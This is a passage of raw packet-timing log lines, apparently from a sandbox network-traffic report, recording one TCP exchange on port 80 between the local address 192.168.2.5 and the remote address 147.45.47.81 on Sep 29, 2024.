                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457391024 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457401991 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457441092 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457473040 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457484961 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457506895 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457556009 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457566023 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457591057 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457618952 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457639933 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457667112 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457711935 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457719088 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457771063 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457803965 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457837105 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457848072 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457870007 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457890987 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457906961 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457940102 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457967043 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457993031 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.457999945 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458018064 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458033085 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458065987 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458076954 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458101034 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458132982 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458152056 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458167076 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458199024 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458209991 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458233118 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458265066 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458276987 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458298922 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458328009 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458343983 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458359957 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458394051 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458425999 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458445072 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458460093 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458470106 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458492994 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458525896 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458539963 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458559990 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458590984 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458621979 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458631039 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458656073 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458661079 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458688974 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458723068 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458755016 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458767891 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458787918 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458805084 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458822012 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458856106 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458889961 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458909988 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.458941936 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.528743029 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.528811932 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.528845072 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.528877020 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.528892994 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.528911114 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.528925896 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.528944016 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.528976917 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.529009104 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.529016018 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.529053926 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.541745901 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.541795969 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.541843891 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.541846037 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.541877985 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.541929960 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.541976929 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.541979074 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542021990 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542027950 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542062044 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542093039 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542135000 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542141914 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542175055 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542187929 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542226076 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542274952 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542308092 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542320967 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542347908 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542356968 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542391062 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542421103 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542453051 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542473078 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542496920 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542500973 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542536020 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542567015 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542598963 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542610884 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542634010 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542637110 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542666912 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542716980 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542749882 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542761087 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542781115 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542793036 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542814970 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542862892 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542895079 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542917013 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542926073 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542943001 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542958975 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.542995930 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543040991 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543045044 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543077946 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543096066 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543126106 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543158054 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543190002 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543203115 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543222904 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543232918 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543257952 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543288946 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543322086 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543332100 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543354034 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543361902 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543423891 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543457031 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543493032 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543500900 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543520927 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543541908 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543555021 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543586969 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543618917 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543628931 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543652058 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543663025 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543683052 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543716908 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543749094 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543766022 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543781996 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543792009 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543813944 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543847084 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543876886 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543889046 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543909073 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543920040 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543941975 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.543975115 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544006109 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544028044 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544039011 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544049978 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544070959 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544104099 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544133902 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544148922 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544167042 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544182062 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544198990 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544231892 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544264078 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544276953 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544298887 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544306040 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544348955 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544382095 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544430017 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544431925 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544464111 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544471979 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544496059 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544548988 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544599056 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544600010 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544631958 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544645071 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544666052 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544698954 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544728041 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544749975 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544769049 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544774055 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544806957 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544853926 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544888020 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544898987 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544919968 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544930935 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544954062 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.544985056 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545017004 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545028925 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545049906 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545059919 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545082092 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545114040 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545145035 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545165062 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545176029 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545188904 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545209885 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545242071 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545274019 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545288086 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545305014 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545315981 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545337915 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545370102 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545403004 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545409918 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545437098 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545445919 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545470953 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545501947 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545535088 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545543909 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545567989 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545577049 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545599937 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545630932 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545663118 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545679092 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545697927 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.545703888 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.598324060 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.615983963 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.616022110 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.616055012 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.616075039 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.616103888 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.616137028 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.616168022 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.616182089 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.616202116 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.616211891 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.616235971 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.618706942 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.628901958 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.628952980 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.628984928 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629002094 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629033089 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629066944 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629098892 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629120111 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.629132986 CEST8049706147.45.47.81192.168.2.5
